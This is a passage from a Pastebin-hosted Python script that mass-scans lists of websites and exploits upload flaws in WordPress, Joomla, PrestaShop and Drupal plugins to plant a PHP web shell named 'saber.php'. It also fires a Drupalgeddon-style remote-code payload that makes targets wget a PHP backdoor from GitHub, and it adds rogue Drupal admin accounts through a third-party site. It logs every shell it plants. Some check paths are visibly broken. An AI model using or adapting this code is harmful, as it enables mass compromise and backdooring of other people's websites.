  668. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  669. ShellCheck = requests.get(site +'/wp-content/themes/centum/revslider/temp/update_extract/revslider/saber.php', timeout=5)
  670. if 'Saber BOT V1' in ShellCheck.content :
  671. print color.GREEN+"[Revslider centum Shell]-VULUN > "+site+'//wp-content/themes/centum/revslider/temp/update_extract/revslider/saber.php'
  672. save= open('results/shells.txt', 'a')
  673. save.write(site+'///wp-content/themes/centum/revslider/temp/update_extract/revslider/saber.php'+'\n')
  674. elif '//wp-content/themes/beach_apollo/' in CheckRevslider.text.encode('utf-8'):
  675. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  676. ShellCheck = requests.get(site +'/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/saber.php', timeout=5)
  677. if 'Saber BOT V1' in ShellCheck.content :
  678. print color.GREEN+"[Revslider centum Shell]-VULUN > "+site+'//wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/saber.php'
  679. save= open('results/shells.txt', 'a')
  680. save.write(site+'//wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/saber.php'+'\n')
  681. else:
  682. print color.RED+"[AddBlockUrl]-NOT VULUN"
  683. pass
  684. except:
  685. print color.RED+"[Revslider]-Not Vulun"
  686. pass
  687. def zoomsound(site):
  688. files = {'file_field': ('saber.php', open('saber.php', 'rb'), 'multipart/form-data')}
  689. post = {
  690. "dm_upload": ""
  691. }
  692. url = site + "/wp-content/plugins/dzs-zoomsounds/admin/upload.php"
  693. try :
  694. req = requests.post(url, files=files)
  695. ww = requests.get(site+"///wp-content/plugins/dzs-zoomsounds/admin/upload/saber.php")
  696. if 'Saber BOT V1' in ww.content :
  697. print color.BOLD+site+"///wp-content/plugins/dzs-zoomsounds/admin/upload/saber.php"
  698. save = open('results/shells.txt', 'a')
  699. save.write(site+"////wp-content/plugins/dzs-zoomsounds/admin/upload/saber.php"+'\n')
  700. save.close()
  701. else:
  702. print color.RED+"[ZoomSound]-Not Vulun"
  703. except :
  704. pass
  705. def showbiz(site):
  706. global jcsh
  707. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  708. Exploit = site + '/wp-admin/admin-ajax.php'
  709. data = {'action': "showbiz_ajax_action", 'client_action': "update_plugin"}
  710. FileShell = {'update_file': open(jcsh, 'rb')}
  711. CheckRevslider = requests.get(site, timeout=5)
  712. try :
  713. if '/wp-content/plugins/showbiz//' in CheckRevslider.text.encode('utf-8'):
  714. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  715. ShellCheck = requests.get(site +'/wp-content/plugins/showbiz/temp/update_extract//saber.php', timeout=5)
  716. if 'Saber BOT V1' in ShellCheck.content :
  717. print color.GREEN+"[revslider Shell]-VULUN > "+site+'/wp-content/plugins/showbiz/temp/update_extract//saber.php'
  718. save= open('results/shells.txt', 'a')
  719. save.write(site+'/wp-content/plugins/showbiz/temp/update_extract//saber.php'+'\n')
  720. else:
  721. print color.RED+"[ShowBiz]-NOT VULUN"
  722. except:
  723. print color.RED+"[ShowBiz]-Not Vulun"
  724. pass
  725. def simpleadsmanager(site):
  726. files = {'uploadfile': ('saber.php', open('saber.php', 'rb'), 'multipart/form-data')}
  727. post = {
  728. "action": "upload_ad_image",
  729. "path": ""
  730. }
  731. url = site + "//wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
  732. try :
  733. req = requests.post(url, files=files, data=post)
  734. ww = requests.get(site+"//wp-content/plugins/simple-ads-manager/saber.php")
  735. if 'Saber BOT V1' in ww.content :
  736. print color.GREEN+site+"//wp-content/plugins/simple-ads-manager/saber.php"
  737. save = open('results/shells.txt', 'a')
  738. save.write(site+"//wp-content/plugins/simple-ads-manager/saber.php"+'\n')
  739. save.close()
  740. else:
  741. print color.RED+"[SimpleAdsManager]-NOt Vulun"
  742. except :
  743. pass
  744. #prestazebi
  745. def columnadverts(site):
  746. try :
  747. ShellFile = {'userfile': open('saber.php', 'rb')}
  748. Exploit = '///modules/columnadverts/uploadimage.php'
  749. exp = site+Exploit
  750. GoT = requests.post(exp, files=ShellFile, timeout=5)
  751. checkk = requests.get(site+'/modules/columnadverts/slides/saber.php')
  752. if 'Saber BOT V1' in checkk.content :
  753. print color.GREEN+"[PhPCalendarEvenet]-Vulun : "+site+'/modules/columnadverts/slides/saber.php'
  754. save = open('resulst/shells.txt', 'a')
  755. save.write(site+'/modules/columnadverts/slides/saber.php'+'\n')
  756. save.close()
  757. else:
  758. print color.RED+"[ColumnAdverts]-Not Vulun"
  759. except :
  760. print color.RED+"[ColumnAdverts]-Not Vulun"
  761. pass
  762. def attributewizardpro(site):
  763. try :
  764. ShellFile = {'userfile': open('saber.php', 'rb')}
  765. Exploit = '///modules/attributewizardpro/uploadimage.php'
  766. exp = site+Exploit
  767. GoT = requests.post(exp, files=ShellFile, timeout=5)
  768. checkk = requests.get(site+'/modules/ /slides/saber.php')
  769. if 'Saber BOT V1' in checkk.content :
  770. print color.GREEN+"[attributewizardpro]-Vulun : "+site+'/modules/attributewizardpro/slides/saber.php'
  771. save = open('resulst/shells.txt', 'a')
  772. save.write(site+'/modules/attributewizardpro/slides/saber.php'+'\n')
  773. save.close()
  774. else:
  775. print color.RED+"[attributewizardpro]-Not Vulun"
  776. except :
  777. print color.RED+"[attributewizardpro]-Not Vulun"
  778. pass
  779.  
  780. def soopamobile(site):
  781. try :
  782. ShellFile = {'userfile': open('saber.php', 'rb')}
  783. Exploit = '///modules/soopamobile/uploadimage.php'
  784. exp = site+Exploit
  785. GoT = requests.post(exp, files=ShellFile, timeout=5)
  786. checkk = requests.get(site+'/modules/soopamobile/slides/saber.php')
  787. if 'Saber BOT V1' in checkk.content :
  788. print color.GREEN+"[SoopaMobile]-Vulun : "+site+'/modules/soopamobile/slides/saber.php'
  789. save = open('resulst/shells.txt', 'a')
  790. save.write(site+'/modules/soopamobile/slides/saber.php'+'\n')
  791. save.close()
  792. else:
  793. print color.RED+"[SoopaMobile]-Not Vulun"
  794. except :
  795. print color.RED+"[SoopaMobile]-Not Vulun"
  796. pass
  797. def attributewizardproOLD(site):
  798. try :
  799. ShellFile = {'userfile': open('saber.php', 'rb')}
  800. Exploit = '///modules/attributewizardproOLD/uploadimage.php'
  801. exp = site+Exploit
  802. GoT = requests.post(exp, files=ShellFile, timeout=5)
  803. checkk = requests.get(site+'/modules/ /slides/saber.php')
  804. if 'Saber BOT V1' in checkk.content :
  805. print color.GREEN+"[attributewizardproOLD]-Vulun : "+site+'/modules/attributewizardproOLD/slides/saber.php'
  806. save = open('resulst/shells.txt', 'a')
  807. save.write(site+'/modules/attributewizardproOLD/slides/saber.php'+'\n')
  808. save.close()
  809. else:
  810. print color.RED+"[attributewizardproOLD]-Not Vulun"
  811. except :
  812. print color.RED+"[attributewizardproOLD]-Not Vulun"
  813. pass
  814.  
  815. def soopabanners(site):
  816. try :
  817. ShellFile = {'userfile': open('saber.php', 'rb')}
  818. Exploit = '///modules/soopabanners/uploadimage.php'
  819. exp = site+Exploit
  820. GoT = requests.post(exp, files=ShellFile, timeout=5)
  821. checkk = requests.get(site+'/modules/soopabanners/slides/saber.php')
  822. if 'Saber BOT V1' in checkk.content :
  823. print color.GREEN+"[soopabanners]-Vulun : "+site+'/modules/soopabanners/slides/saber.php'
  824. save = open('resulst/shells.txt', 'a')
  825. save.write(site+'/modules/soopabanners/slides/saber.php'+'\n')
  826. save.close()
  827. else:
  828. print color.RED+"[soopabanners]-Not Vulun"
  829. except :
  830. print color.RED+"[soopabanners]-Not Vulun"
  831. pass
  832. def vtermslideshow(site):
  833. try :
  834. ShellFile = {'userfile': open('saber.php', 'rb')}
  835. Exploit = '///modules/vtermslideshow/uploadimage.php'
  836. exp = site+Exploit
  837. GoT = requests.post(exp, files=ShellFile, timeout=5)
  838. checkk = requests.get(site+'/modules/vtermslideshow/slides/saber.php')
  839. if 'Saber BOT V1' in checkk.content :
  840. print color.GREEN+"[vtermslideshow]-Vulun : "+site+'/modules/vtermslideshow/slides/saber.php'
  841. save = open('resulst/shells.txt', 'a')
  842. save.write(site+'/modules/vtermslideshow/slides/saber.php'+'\n')
  843. save.close()
  844. else:
  845. print color.RED+"[vtermslideshow]-Not Vulun"
  846. except :
  847. print color.RED+"[vtermslideshow]-Not Vulun"
  848. pass
  849. def simpleslideshow(site):
  850. try :
  851. ShellFile = {'userfile': open('saber.php', 'rb')}
  852. Exploit = '///modules/simpleslideshow/uploadimage.php'
  853. exp = site+Exploit
  854. GoT = requests.post(exp, files=ShellFile, timeout=5)
  855. checkk = requests.get(site+'/modules/ /slides/saber.php')
  856. if 'Saber BOT V1' in checkk.content :
  857. print color.GREEN+"[simpleslideshow]-Vulun : "+site+'/modules/simpleslideshow/slides/saber.php'
  858. save = open('resulst/shells.txt', 'a')
  859. save.write(site+'/modules/simpleslideshow/slides/saber.php'+'\n')
  860. save.close()
  861. else:
  862. print color.RED+"[simpleslideshow]-Not Vulun"
  863. except :
  864. print color.RED+"[simpleslideshow]-Not Vulun"
  865. pass
  866. def homepageadvertise2(site):
  867. try :
  868. ShellFile = {'userfile': open('saber.php', 'rb')}
  869. Exploit = '///modules/homepageadvertise2/uploadimage.php'
  870. exp = site+Exploit
  871. GoT = requests.post(exp, files=ShellFile, timeout=5)
  872. checkk = requests.get(site+'/modules/ /slides/saber.php')
  873. if 'Saber BOT V1' in checkk.content :
  874. print color.GREEN+"[homepageadvertise2]-Vulun : "+site+'/modules/homepageadvertise2/slides/saber.php'
  875. save = open('resulst/shells.txt', 'a')
  876. save.write(site+'/modules/homepageadvertise2/slides/saber.php'+'\n')
  877. save.close()
  878. else:
  879. print color.RED+"[homepageadvertise2]-Not Vulun"
  880. except :
  881. print color.RED+"[homepageadvertise2]-Not Vulun"
  882. pass
  883. def jro_homepageadvertise(site):
  884. try :
  885. ShellFile = {'userfile': open('saber.php', 'rb')}
  886. Exploit = '///modules/jro_homepageadvertise/uploadimage.php'
  887. exp = site+Exploit
  888. GoT = requests.post(exp, files=ShellFile, timeout=5)
  889. checkk = requests.get(site+'/modules/ /slides/saber.php')
  890. if 'Saber BOT V1' in checkk.content :
  891. print color.GREEN+"[jro_homepageadvertise]-Vulun : "+site+'/modules/jro_homepageadvertise/slides/saber.php'
  892. save = open('resulst/shells.txt', 'a')
  893. save.write(site+'/modules/jro_homepageadvertise/slides/saber.php'+'\n')
  894. save.close()
  895. else:
  896. print color.RED+"[jro_homepageadvertise]-Not Vulun"
  897. except :
  898. print color.RED+"[jro_homepageadvertise]-Not Vulun"
  899. pass
  900. def oneattributewizardpro(site):
  901. try :
  902. ShellFile = {'userfile': open('saber.php', 'rb')}
  903. Exploit = '///modules/oneattributewizardpro/uploadimage.php'
  904. exp = site+Exploit
  905. GoT = requests.post(exp, files=ShellFile, timeout=5)
  906. checkk = requests.get(site+'/modules/ /slides/saber.php')
  907. if 'Saber BOT V1' in checkk.content :
  908. print color.GREEN+"[oneattributewizardpro]-Vulun : "+site+'/modules/oneattributewizardpro/slides/saber.php'
  909. save = open('resulst/shells.txt', 'a')
  910. save.write(site+'/modules/oneattributewizardpro/slides/saber.php'+'\n')
  911. save.close()
  912. else:
  913. print color.RED+"[oneattributewizardpro]-Not Vulun"
  914. except :
  915. print color.RED+"[oneattributewizardpro]-Not Vulun"
  916. pass
  917. def attributewizardpro_x(site):
  918. try :
  919. ShellFile = {'userfile': open('saber.php', 'rb')}
  920. Exploit = '///modules/attributewizardpro_x/uploadimage.php'
  921. exp = site+Exploit
  922. GoT = requests.post(exp, files=ShellFile, timeout=5)
  923. checkk = requests.get(site+'/modules/ /slides/saber.php')
  924. if 'Saber BOT V1' in checkk.content :
  925. print color.GREEN+"[attributewizardpro_x]-Vulun : "+site+'/modules/attributewizardpro_x/slides/saber.php'
  926. save = open('resulst/shells.txt', 'a')
  927. save.write(site+'/modules/attributewizardpro_x/slides/saber.php'+'\n')
  928. save.close()
  929. else:
  930. print color.RED+"[attributewizardpro_x]-Not Vulun"
  931. except :
  932. print color.RED+"[attributewizardpro_x]-Not Vulun"
  933. pass
  934.  
  935. def productpageadverts(site):
  936. try :
  937. ShellFile = {'userfile': open('saber.php', 'rb')}
  938. Exploit = '///modules/productpageadverts/uploadimage.php'
  939. exp = site+Exploit
  940. GoT = requests.post(exp, files=ShellFile, timeout=5)
  941. checkk = requests.get(site+'/modules/ /slides/saber.php')
  942. if 'Saber BOT V1' in checkk.content :
  943. print color.GREEN+"[productpageadverts]-Vulun : "+site+'/modules/productpageadverts/slides/saber.php'
  944. save = open('resulst/shells.txt', 'a')
  945. save.write(site+'/modules/productpageadverts/slides/saber.php'+'\n')
  946. save.close()
  947. else:
  948. print color.RED+"[productpageadverts]-Not Vulun"
  949. except :
  950. print color.RED+"[productpageadverts]-Not Vulun"
  951. pass
  952. def homepageadvertise(site):
  953. try :
  954. ShellFile = {'userfile': open('saber.php', 'rb')}
  955. Exploit = '///modules/homepageadvertise/uploadimage.php'
  956. exp = site+Exploit
  957. GoT = requests.post(exp, files=ShellFile, timeout=5)
  958. checkk = requests.get(site+'/modules/ /slides/saber.php')
  959. if 'Saber BOT V1' in checkk.content :
  960. print color.GREEN+"[homepageadvertise]-Vulun : "+site+'/modules/homepageadvertise/slides/saber.php'
  961. save = open('resulst/shells.txt', 'a')
  962. save.write(site+'/modules/homepageadvertise/slides/saber.php'+'\n')
  963. save.close()
  964. else:
  965. print color.RED+"[homepageadvertise]-Not Vulun"
  966. except :
  967. print color.RED+"[homepageadvertise]-Not Vulun"
  968. pass
  969. def videostab(site):
  970. try :
  971. ShellFile = {'userfile': open('saber.php.mp4', 'rb')}
  972. Exploit = '///modules/videostab/uploadimage.php'
  973. exp = site+Exploit
  974. GoT = requests.post(exp, files=ShellFile, timeout=5)
  975. checkk = requests.get(site+'/modules/ /slides/saber.php')
  976. if 'Saber BOT V1' in checkk.content :
  977. print color.GREEN+"[videostab]-Vulun : "+site+'/modules/videostab/slides/saber.php.mp4'
  978. save = open('resulst/shells.txt', 'a')
  979. save.write(site+'/modules/videostab/slides/saber.php.mp4'+'\n')
  980. save.close()
  981. else:
  982. print color.RED+"[videostab]-Not Vulun"
  983. except :
  984. print color.RED+"[videostab]-Not Vulun"
  985. pass
  986. def wg24themeadministration(site):
  987. try :
  988. ShellFile = {'userfile': open('saber.php', 'rb')}
  989. Exploit = '///modules/wg24themeadministration/uploadimage.php'
  990. exp = site+Exploit
  991. GoT = requests.post(exp, files=ShellFile, timeout=5)
  992. checkk = requests.get(site+'/modules/ /slides/saber.php')
  993. if 'Saber BOT V1' in checkk.content :
  994. print color.GREEN+"[wg24themeadministration]-Vulun : "+site+'/modules/wg24themeadministration/slides/saber.php'
  995. save = open('resulst/shells.txt', 'a')
  996. save.write(site+'/modules/wg24themeadministration/slides/saber.php'+'\n')
  997. save.close()
  998. else:
  999. print color.RED+"[wg24themeadministration]-Not Vulun"
  1000. except :
  1001. print color.RED+"[wg24themeadministration]-Not Vulun"
  1002. pass
  1003. #drupal
  1004. def drupal(site):
  1005. #upload this script in other shell (or ur localhost) https://pastebin.com/raw/wPAbtyJ4 Thanks Gass <3
  1006. exp = 'http://iphonefixercolchester.co.uk/wp-admin/comment.php'
  1007. po = exp+'?url='+site+'&submit=submit'
  1008. try :
  1009. zeb = requests.get(po)
  1010. if 'Success' in zeb.content :
  1011. print color.GREEN+"[Drupal ADD Admin]-Vulun : "+site+' User:gassrini pass :admin'
  1012. save = open('results/drupal.txt')
  1013. save.write(site+':gassrini:admin'+'\n')
  1014. save.close()
  1015. else:
  1016. print color.RED+"[Drupal ADD Admin]-Not Vulun"
  1017. except:
  1018. print color.RED+"[Drupal ADD Admin]-Not Vulun"
  1019. pass
  1020.  
  1021. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  1022. headers = {'User-Agent': 'Mozilla 5.0'}
  1023. def drugeddon(u):
  1024. try:
  1025. url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  1026. r = requests.post(url, data=payload, verify=False, headers=headers)
  1027. if 'Select Your File :' in requests.get(u+'/payload.php', verify=False, headers=headers).text:
  1028. print color.GREEN+'[Drupal Rce]-Vulun ', u + '/payload.php'
  1029. with open('results/shells.txt', mode='a') as d:
  1030. d.write(u + '/payload.php\n')
  1031. else:
  1032. print color.RED+u, " -> Not exploitable"
  1033. except:
  1034. pass
  1035. def check(site):
  1036. headers = {'User-Agent': 'Mozilla 5.0'}
  1037. try :
  1038. w = requests.get(site, verify=False, headers=headers)
  1039. if 'wordpress' in w.content or '/wp-content/' in w.content :
  1040. save = open('tmp/wordpress.txt', 'a')
  1041. save.write(site+'\n')
  1042. print color.PURPLE+site,'-WordPress'
  1043. print color.GREEN+"[+]Gravity Forms"
  1044. gravity(site)
  1045. print color.GREEN+"[+]Revslider"
  1046. revslider(site)
  1047. print color.GREEN+"[+]ShowBiz"
  1048. showbiz(site)
  1049. print color.GREEN+"[+]AddBlockUrl"
  1050. addblockurl(site)
  1051. print color.GREEN+"[+]CherryPlugin"
  1052. cherry(site)
  1053. print color.GREEN+"[+]Wysija"
  1054. wysija(site)
  1055. print color.GREEN+"[+]FormCaft"
  1056. formcaft(site)
  1057. print color.GREEN+"[+]Revslider Get Config"
  1058. revslidergetconfig(site)
  1059. print color.GREEN+"[+]Work The Flow File Upload"
  1060. wtffu(site)
  1061. print color.GREEN+"[+]SimpleAdsManager"
  1062. simpleadsmanager(site)
  1063. print color.GREEN+"[+]DownloadsManager"
  1064. downloadsmanager(site)
  1065. print color.GREEN+"[+]Inboundio-Marketing"
  1066. inboundiomarketing(site)
  1067. print color.GREEN+"[+]ZoomSound"
  1068. zoomsound(site)
  1069. print color.GREEN+"[+]ReflexGaller"
  1070. reflexgallery(site)
  1071. print color.GREEN+"[+]SexyContactForm"
  1072. sexycontacoform(site)
  1073. print color.GREEN+"[+]PhPCalendarEvenet"
  1074. phpeventcalendar(site)
  1075. print color.GREEN+"[+]WPShop"
  1076. elif 'Joomla' in w.content :
  1077. save = open('tmp/joomla.txt', 'a')
  1078. save.write(site+'\n')
  1079. print color.PURPLE+site,"-Joomla"
  1080. print color.GREEN+"[+]JCE IMAGE"
  1081. jce(site)
  1082. print color.GREEN+"[+]JCE SHELL"
  1083. jceshell(site)
  1084. print color.GREEN+"[+]ALBERGHI"
  1085. alberghi(site)
  1086. print color.GREEN+"[+]RCE"
  1087. rce(site)
  1088. print color.GREEN+"[+]AdsManager Shell"
  1089. adsmanager(site)
  1090. print color.GREEN+"[+]AdsManager Index"
  1091. adsindex(site)
  1092. print color.GREEN+"[+]Com_Fabrik Index"
  1093. fabric_index(site)
  1094. print color.GREEN+"[+]Com_MyBlog"
  1095. myblog(site)
  1096. print color.GREEN+"[+]Cckjseblod"
  1097. cckjseblod(site)
  1098. print color.GREEN+"[+]MacGallery"
  1099. macgallery(site)
  1100. print color.GREEN+"[+]HdfVPlayer"
  1101. hdflvplayer(site)
  1102. print color.GREEN+"[+]ModSimpleFileUpload"
  1103. modsimplefileupload(site)
  1104. elif 'PrestaShop' in w.content :
  1105. print color.PURPLE+site,"-PrestaShop"
  1106. save = open('tmp/prestashop.txt', 'a')
  1107. save.write(site+'\n')
  1108. print color.GREEN+"[+]ColumnAdverts"
  1109. columnadverts(site)
  1110. print color.GREEN+"[+]SoopaMobile"
  1111. soopamobile(site)
  1112. print color.GREEN+"[+]SoopaBanner"
  1113. soopabanners(site)
  1114. print color.GREEN+"[+]VTermSlideShow"
  1115. vtermslideshow(site)
  1116. print color.GREEN+"[+]SimpleSlideShow"
  1117. simpleslideshow(site)
  1118. print color.GREEN+"[+]ProductPageAdverts"
  1119. productpageadverts(site)
  1120. print color.GREEN+"[+]HomePageAdvertise"
  1121. homepageadvertise(site)
  1122. print color.GREEN+"[+]HomePageAdvertise2"
  1123. homepageadvertise2(site)
  1124. print color.GREEN+"[+]JRO_HomePageAdvertise"
  1125. jro_homepageadvertise(site)
  1126. print color.GREEN+"[+]AttributeWizardPro"
  1127. attributewizardpro(site)
  1128. print color.GREEN+"[+]OneAttributeWizardPro"
  1129. oneattributewizardpro(site)
  1130. print color.GREEN+"[+]AttributeWizardProOld"
  1131. attributewizardproOLD(site)
  1132. print color.GREEN+"[+]AttributeWizardPro_X"
  1133. attributewizardpro_x(site)
  1134. print color.GREEN+"[+]VideoStab"
  1135. videostab(site)
  1136. print color.GREEN+"[+]Wg24ThemeAdministration"
  1137. wg24themeadministration(site)
  1138. elif 'Drupal' in w.content or 'drupal' in w.content:
  1139. print color.PURPLE+site,"-Drupal"
  1140. save = open('tmp/drupal.txt', 'a')
  1141. save.write(site+'\n')
  1142. print color.GREEN+"[+]Drupal Add Admin"
  1143. drupal(site)
  1144. print color.GREEN+"[+]Drupal Rce"
  1145. drugeddon(site)
  1146. else:
  1147. print color.RED+site,"[Unkown]"
  1148. except :
  1149. pass
  1150. site = []
  1151. def clear():
  1152. if os.name == 'nt':
  1153. os.system('cls')
  1154. else:
  1155. os.system('clear')
  1156. def normal(lista):
  1157. file = open(lista).readlines()
  1158. if (len(file) > 0):
  1159. for zeb in file:
  1160. nouna = zeb.rstrip()
  1161. check(nouna)
  1162.  
  1163. class color:
  1164. PURPLE = '\033[95m'
  1165. CYAN = '\033[96m'
  1166. DARKCYAN = '\033[36m'
  1167. BLUE = '\033[94m'
  1168. GREEN = '\033[92m'
  1169. YELLOW = '\033[93m'
  1170. RED = '\033[91m'
  1171. BOLD = '\033[1m'
  1172. UNDERLINE = '\033[4m'
  1173. END = '\033[0m'
  1174. clear()
  1175. def banner():
  1176. print color.BOLD+logo
  1177. print color.BOLD+"[1]MultiThread Scan"
  1178. print color.BOLD+"[2]SingleThread Scan"
  1179. ch = raw_input(">")
  1180. if ch == '1':
  1181. print "usage : python "+sys.argv[0]+" list.txt"
  1182. if ch == '2':
  1183. normal()
  1184. if os.name == 'nt':
  1185. try:
  1186. target = [i.strip() for i in open(sys.argv[4], mode='r').readlines()]
  1187. except IndexError:
  1188. pass
  1189. if '-t' in sys.argv :
  1190. try :
  1191. mp = Pool(int(sys.argv[2]))
  1192. mp.map(check, target)
  1193. mp.close()
  1194. mp.join()
  1195. except :
  1196. pass
  1197. elif '-u' in sys.argv :
  1198. normal(sys.argv[2])
  1199. else:
  1200. print logo
  1201. print "Usage : MultiThread : "+sys.argv[0]+" -t thteads -u lists"
  1202. print "Usage : SingleThread : "+sys.argv[0]+" -u lists"
  1203. else:
  1204. banner()
  1205. try:
  1206. target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  1207. except IndexError:
  1208. pass
  1209. if len(sys.argv) == 2:
  1210. try :
  1211. mp = Pool(150)
  1212. mp.map(check, target)
  1213. mp.close()
  1214. mp.join()
  1215. except :
  1216. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!